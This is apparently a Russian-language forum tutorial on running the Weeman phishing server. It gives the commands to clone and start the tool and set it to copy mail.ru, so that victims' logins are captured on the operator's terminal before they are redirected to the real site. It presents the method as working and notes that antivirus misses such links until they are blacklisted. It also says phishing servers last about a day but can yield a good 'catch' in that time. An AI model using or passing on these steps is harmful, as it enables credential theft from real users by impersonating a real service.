Weeman. Как легко поднять web-server для фишинга

Здесь я хочу показать, как легко поднять простой, но довольно эффективный web-server для фишинга.

upload_2016-10-31_21-25-7.png

Он будет захватывать все введенные жертвой учетные данные в формах и собственно, передавать их на терминал сервера.

Софт, который будет использоваться – это Weeman, http сервер для фишинга, написанный на Python. Итак, для того чтобы воспользоваться им, откроем терминал и введем следующую команду.

> git clone https://github.com/Hypsurus/weeman

Затем перейдем в папку, куда был скачан сервер, и выполним следующие команды:

> cd weeman/

> ls –a

> chmod a+x weeman.py

> ./weeman.py

> help (сразу посмотрим доступные опции)


> show (посмотрим текущие настройки)


Используем weeman на примере mail.ru.



> set url https://mail.ru

> set port 8080

> set action_url https://mail.ru

> run

 

Теперь, при обращении к серверу по адресу, в моем случае это XXX.XXX.X.92:8080, мы попадаем на фишинговый вариант сайта mail.ru, внешне ничем не отличается:

 

После того как мы введем свои учетные данные сработает редирект на подлинный сайт, а мы получим учетные данные.

 

На этом пожалуй все, спасибо за внимание.

Способ описан автором Vander, повторено мной, скрины мои. Способ рабочий.

Антивирь не определит, шо это фишинговая ссыль, пока она не будет занесена в базу, так что для локального сегмента это работает... Если же вы используете это во внешней сети, то фишинговые сервера живут не более суток. Но и за сутки, можно неплохой улов сделать.